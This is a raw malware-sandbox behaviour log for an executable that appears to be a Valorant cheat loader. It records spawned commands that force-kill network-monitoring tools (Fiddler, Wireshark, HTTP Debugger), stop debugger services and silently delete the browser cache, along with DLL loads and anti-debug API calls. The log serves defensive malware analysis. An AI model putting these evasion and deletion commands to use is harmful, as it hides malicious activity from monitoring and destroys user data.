Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdkJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: PlusPrivStoreAtt116.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: PlusPrivStoreAtt116.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PlusPrivStoreAtt116.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PlusPrivStoreAtt116.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PlusPrivStoreAtt116.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PlusPrivStoreAtt116.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PlusPrivStoreAtt116.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: PlusPrivStoreAtt116.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: PlusPrivStoreAtt116.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\BACKUP BOTS PRIVATE STORE\Loader Valorant Plus\x64\Release\EpicGames.pdb source: PlusPrivStoreAtt116.exe
Source: Binary string: .D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\BACKUP BOTS PRIVATE STORE\Loader Valorant Plus\x64\Release\EpicGames.pdb source: PlusPrivStoreAtt116.exe
Source: PlusPrivStoreAtt116.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PlusPrivStoreAtt116.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PlusPrivStoreAtt116.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PlusPrivStoreAtt116.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PlusPrivStoreAtt116.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029C9290 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,strpbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,GetProcAddress,if_nametoindex,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoA,QueryPerformanceFrequency,0_2_00007FF6029C9290
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeWindow / User API: threadDelayed 5113Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeWindow / User API: threadDelayed 4861Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 3570Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeAPI coverage: 5.2 %
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exe TID: 5876Thread sleep time: -255650s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exe TID: 5876Thread sleep time: -243050s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: PlusPrivStoreAtt116.exe, 00000000.00000002.2630935797.00000259F165C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF602A0067C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF602A0067C
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF602A00A18 memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF602A00A18
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF6029C9290 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,strpbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,GetProcAddress,if_nametoindex,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoA,QueryPerformanceFrequency,0_2_00007FF6029C9290
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF602A00384 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF602A00384
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF602A00824 SetUnhandledExceptionFilter,0_2_00007FF602A00824
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeCode function: 0_2_00007FF602A0067C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF602A0067C
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
Source: C:\Users\user\Desktop\PlusPrivStoreAtt116.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1Jump to behavior
